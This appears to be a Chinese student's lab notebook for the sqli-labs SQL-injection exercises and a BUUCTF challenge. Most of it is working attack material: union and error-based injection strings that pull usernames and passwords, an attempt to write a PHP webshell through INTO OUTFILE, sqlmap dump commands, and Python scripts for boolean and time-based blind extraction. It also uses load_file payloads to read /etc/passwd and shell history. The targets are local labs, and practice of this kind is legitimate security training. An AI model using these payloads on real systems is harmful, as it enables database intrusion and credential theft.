目录
第一关:
思路:
需要用order by检测他的列数 列数3列;
让第一个表查询为空 库名security;
最终目的 注入管理员账号密码;
首先你要管理员表的表名;
列名
\1. 查表名:select table_name from tables where table_schema=’security’;
\2. 查表的列名:select column_name from columns weher table_schema=’security’ and table_name=’users’;
3.查账号密码:select username,password from security.users;
4.查用户user和数据库:?id=-1” union select 1,user(),database()--+
第五关:
1.尝试找注入点
2.尝试报错注入:?id=1%27 and updatexml(1,concat(0x7e,user(),0x7e),1)--+
3.?id=1%27 and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password)from users),0x7e),1)--+
4.select substr(database(),1,1); 表示从左往右截取一位
第六关
1.查组名:?id=1" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+
2.查表名的列名的字段:
?id=1" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)--+
第七关
1.如何导出webshell
//connectivity
//mysql用户权限必须为rrot
//知道网站的物理路径
//E:\phpstudy_pro\www\sqli-labs\
//有一个参数必须为空(secure_file_priv必须为空)
select substr(database(),32,64);
2.导出webshell:?id=1')) union select 1,2,"<?php phpinfo();" into outfile "E:/phpstudy_pro/www/sqli-labs/webshell.php";--+
失败了,尝试多次也没有导出
第八关
1.截取数据库第一个字段,如果不对则无法显示:?id=1' and ascii(substr(database(),1,1))=115--+
2.利用sqlmap工具查数据库:python sqlmap-1.8/sqlmap.py -u http://127.0.0.1/sqli-labs/Less-8/?id=1 -dbs
3.查security的表名:python sqlmap-1.8/sqlmap.py -u http://127.0.0.1/sqli-labs/Less-8/?id=1 -D security --tables
4.查users的列名:python sqlmap-1.8/sqlmap.py -u http://127.0.0.1/sqli-labs/Less-8/?id=1 -D security -T users --columns
5.查users的账号和密码:python sqlmap-1.8/sqlmap.py -u http://127.0.0.1/sqli-labs/Less-8/?id=1 -D security -T users --dump -C "username,password"
6.使用python查询数据库security
import requests
url = 'http://127.0.0.1/sqli-labs/Less-8/index.php'
def inject_database(url):
name = ''
for i in range(1, 20):
for j in range(32, 129):
payload = "1' and ascii(substr(database(), %d, 1)) = %d-- " % (i, j)
res = {"id": payload}
r = requests.get(url, params=res)
if "You are in..........." in r.text:
name = name + chr(j)
print(name)
break
else:
continue
inject_database(url)
第九关
1.使用二分法查数据库
import time
import requests
url = 'http://127.0.0.1/sqli-labs/Less-9/index.php'
def inject_database(url):
name = ''
for i in range(1, 20):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = "1' and if(ascii(substr(database(), %d, 1)) > %d, sleep(1), 0)-- " % (i, mid)
res = {"id": payload}
start_time = time.time()
r = requests.get(url, params=res)
end_time = time.time()
if end_time - start_time >= 1:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if mid == 32:
break
name = name + chr(mid)
print(name)
inject_database(url)
第十一关
1.使用post传参,登录用户
2.账号输入该代码,可以查询表名,密码随便输入:a' union select 1,group_concat(table_name)from information_schema.tables where table_schema='security'#
第十三关
1.使用报错注入查询用户,密码谁便:aaa') and updatexml(1,concat(0x7e,(select user()),0x7e),1)#
2.') and updatexml(1,concat(0x7e,(select database()),0x7e),1)-- + 判断库名
3.') and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1)-- + 判断表名
4.') and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1)-- + 判断列名
5.') and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- + 判断数据
第二十四关
1.二次注入
输入账号admin,密码123登录
2.重置密码为123456
3.用密码123登录失败
4.用密码123456登录成功
二次注入实战1
1.发帖
2.用burpsuit暴力破解密码为zhangwei666
3.扫描该地址:python dirmap.py -i 实例无法访问 / Instance can't be reached at that time | BUUCTF -lcf
4.加上.git,正常为not found不存在,但未forbidden说明存在漏洞:实例无法访问 / Instance can't be reached at that time | BUUCTF
5.发帖,提交留言获取root用户
6.comment操作时直接取出单引号就能闭合:',content=(select(load_file("/etc/passwd"))),/*;
*/#
7.接下来读取文件,注意看到/home/www下以bash身份运行
',content=(select(load_file("/home/www/.bash_history"))),/*
8.',content=(select(load_file("/tmp/html/.DS_Store"))),/*
9.未显示完全,用hex编码显示:',content=(select hex(load_file("/tmp/html/.DS_Store"))),/*
10.',content=(select hex(load_file("/tmp/html/flag_8946e1ff1ee3e40f.php"))),/*
11.发现flag是假的:',content=(select hex(load_file("/var/www/html/flag_8946e1ff1ee3e40f.php"))),/*